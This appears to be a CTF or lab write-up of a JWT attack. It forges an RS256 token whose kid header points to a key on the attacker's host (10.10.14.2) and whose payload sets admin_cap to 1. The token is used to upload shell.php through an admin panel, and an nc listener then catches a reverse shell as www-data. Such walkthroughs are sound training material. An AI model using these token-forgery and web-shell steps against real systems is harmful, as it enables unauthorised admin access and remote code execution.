3 :80 JWT exploitation

Generating JWT

https://gist.github.com/ygotthilf/baa58da5c3dd1f69fae9
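# RSA
# Generate a 2048-bit RSA private key for RS256 signing.
# genrsa is documented as `openssl genrsa [options] numbits`; giving 2048 before
# -out is rejected by some OpenSSL releases ("Extra arguments given"), so keep
# the key size last.
openssl genrsa -out jwtRSA256-private.pem 2048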
You now have the private key jwtRSA256-private.pem in PEM format.
Extract the matching public key from it:
# Derive the public half of jwtRSA256-private.pem and write it as PEM.
openssl rsa -pubout -outform PEM -in jwtRSA256-private.pem -out jwtRSA256-public.pem

Using https://learn.akamai.com/en-us/webhelp/iot/jwt-access-control/GUID-CB17F8FF-3367-4D4B-B3FE-FDBA53A5EA02.html
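# base64url per the JWT spec: '+'->'-', '/'->'_', padding stripped.
# The original `sed s/\+/-/` only rewrote the first '+' and never touched '/',
# and GNU base64 wraps at 76 columns, so the result could contain a newline;
# tr -d '\n=' removes both the wrap and the padding in one pass.
b64url() { base64 | tr -d '\n=' | tr -- '+/' '-_'; }

# header
# printf rather than echo -n: no trailing newline and no portability surprises.
# Note: kid here is a URL; a verifier should resolve kid only against its own
# configured key set, never fetch a key from the token itself.
printf '%s' '{"typ": "JWT","alg": "RS256","kid": "http://10.10.14.2/jwtRS256.key"}' | b64url

# payload
printf '%s' '{"username": "kashz","email": "kashz@local.host","admin_cap": 1}' | b64url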

# header
eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9

# payload
eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ

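# signature
# RS256 signs the exact "<header>.<payload>" bytes; printf (not echo -n) so no
# trailing newline is included in what gets signed. `openssl dgst -sign` with an
# RSA key produces the PKCS#1 v1.5 signature RS256 expects; the trailing tr
# calls turn standard base64 into unpadded base64url.
# NOTE(review): the key generated above is jwtRSA256-private.pem but this signs
# with jwtRS256.key — confirm both names refer to the same private key.
signing_input='eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9.eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ'
printf '%s' "$signing_input" \
  | openssl dgst -sha256 -binary -sign jwtRS256.key \
  | openssl enc -base64 \
  | tr -d '\n=' \
  | tr -- '+/' '-_'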
iISvM2pXcrPLGub06Bf0t0WH2vin_GuqnN6j6sII1b6AalPkLmAuMxdNobHnaEfwi5lzeKx3IBhzbtTgUHwB_Eijpns8cW4u15cpO7pW_Om2YoflXSn2jl9NmAKSc3rDytnnAeCZsGLdyZM-beKc8RoXoyzLHIm35aa01lG2V2898uHXtPY7IRY00etnvkQ8yVLUAvLC0rhJc8ew9bWhSC65AdBGelpcy8WhrPKXzZVtQJqyeX8nbXypwMbwznqGAaB9PR-7XJ7YuKe0ENd_-GOJ_9qKXfb42Lg6yw0kMeMJDroKZQJwQGcR0k-R9sq9ehIMExOxINfbSOkuAGajiPO65rxPAr40objxngn_-WLksTWsJ94jVc3Xuyw-WRtjqQWY4aBDTGIX9YO90v4hXNsjUw5y98Bis19Altgw_PhblOo1l1Eu42RXVMuHRhs79g5a-0kZ1XqI0aOJqwRyJNg8EaY4I1xeJidmAjH_R4kJWTO4NeS5-QZl1SbpuIGzJ3XwGfPNl8QGqQ1yQL4zxK-bwtP0iBnuZBBkq_pwVw6CvqkR9PloTrIH1Jh6tbYhYvm1FBsAiKD7cGCWfNP-N_cDJKGl10CY64DW2o-L8BF5OD-sbnUK4YAtcVYyRsQHZ1_1yLHlk56AH8M3TQVjRiAoaMcM8JXn1-d1Q39O-7c

# JWT
eyJ0eXAiOiAiSldUIiwiYWxnIjogIlJTMjU2Iiwia2lkIjogImh0dHA6Ly8xMC4xMC4xNC4yL2p3dFJTMjU2LmtleSJ9.eyJ1c2VybmFtZSI6ICJrYXNoeiIsImVtYWlsIjogImthc2h6QGxvY2FsLmhvc3QiLCJhZG1pbl9jYXAiOiAxfQ.iISvM2pXcrPLGub06Bf0t0WH2vin_GuqnN6j6sII1b6AalPkLmAuMxdNobHnaEfwi5lzeKx3IBhzbtTgUHwB_Eijpns8cW4u15cpO7pW_Om2YoflXSn2jl9NmAKSc3rDytnnAeCZsGLdyZM-beKc8RoXoyzLHIm35aa01lG2V2898uHXtPY7IRY00etnvkQ8yVLUAvLC0rhJc8ew9bWhSC65AdBGelpcy8WhrPKXzZVtQJqyeX8nbXypwMbwznqGAaB9PR-7XJ7YuKe0ENd_-GOJ_9qKXfb42Lg6yw0kMeMJDroKZQJwQGcR0k-R9sq9ehIMExOxINfbSOkuAGajiPO65rxPAr40objxngn_-WLksTWsJ94jVc3Xuyw-WRtjqQWY4aBDTGIX9YO90v4hXNsjUw5y98Bis19Altgw_PhblOo1l1Eu42RXVMuHRhs79g5a-0kZ1XqI0aOJqwRyJNg8EaY4I1xeJidmAjH_R4kJWTO4NeS5-QZl1SbpuIGzJ3XwGfPNl8QGqQ1yQL4zxK-bwtP0iBnuZBBkq_pwVw6CvqkR9PloTrIH1Jh6tbYhYvm1FBsAiKD7cGCWfNP-N_cDJKGl10CY64DW2o-L8BF5OD-sbnUK4YAtcVYyRsQHZ1_1yLHlk56AH8M3TQVjRiAoaMcM8JXn1-d1Q39O-7c

Using this JWT, we get access to /admin > Admin Panel > Upload File, where shell.php is uploaded.

$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.230] 36950
SOCKET: Shell has connected! PID: 18028
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
